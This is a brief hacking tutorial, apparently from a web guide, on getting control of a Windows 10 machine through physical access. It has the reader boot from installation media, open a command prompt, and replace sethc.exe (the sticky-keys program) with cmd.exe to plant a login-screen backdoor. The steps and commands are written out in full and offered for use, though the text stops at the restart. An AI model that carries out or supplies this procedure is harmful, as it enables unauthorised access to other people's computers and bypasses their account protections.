Get Control Over Windows

How to hack Windows passwords on physical machines using a Windows installation bootable USB disk

The following example is using a Windows 10 Pro machine on VMware. The steps will be similar when using a bootable USB disk.

Select the bootable disk and in the case of Figure 1, it would be 'EFI VMware Virtual SATA CDROM Drive (1.0)

Press "Shift" + "F10" to open the command prompt as show in Figure 4

X:\Sources>c:

C:\>

Type 'dir' + 'Enter' to list all the files and directories to check if C Drive is the correct disk drive

C:>dir

In Figure 7, we will need to change to the directory where the files cmd.exe and sethc.exe are located by entering 'cd Windows\System32' into the command prompt

c:\>cd Windows\System32

c:\Windows\System32>

Let's back up the sethc.exe file to sethc_bak.exe using the rename command 'ren' as shown in Figure 8

c:\Windows\System32>ren sethc.exe sethc_bak.exe

c:\Windows\System32>copy cmd.exe sethc.exe

Close the command prompt window as shown in Figure 10 by clicking on the top right red 'x'

Proceed to cancel the Windows installation setup as shown in Figure 11
Restart the machine and remove the bootable installation USB disk drive if you are using one.

Last updated 3 years ago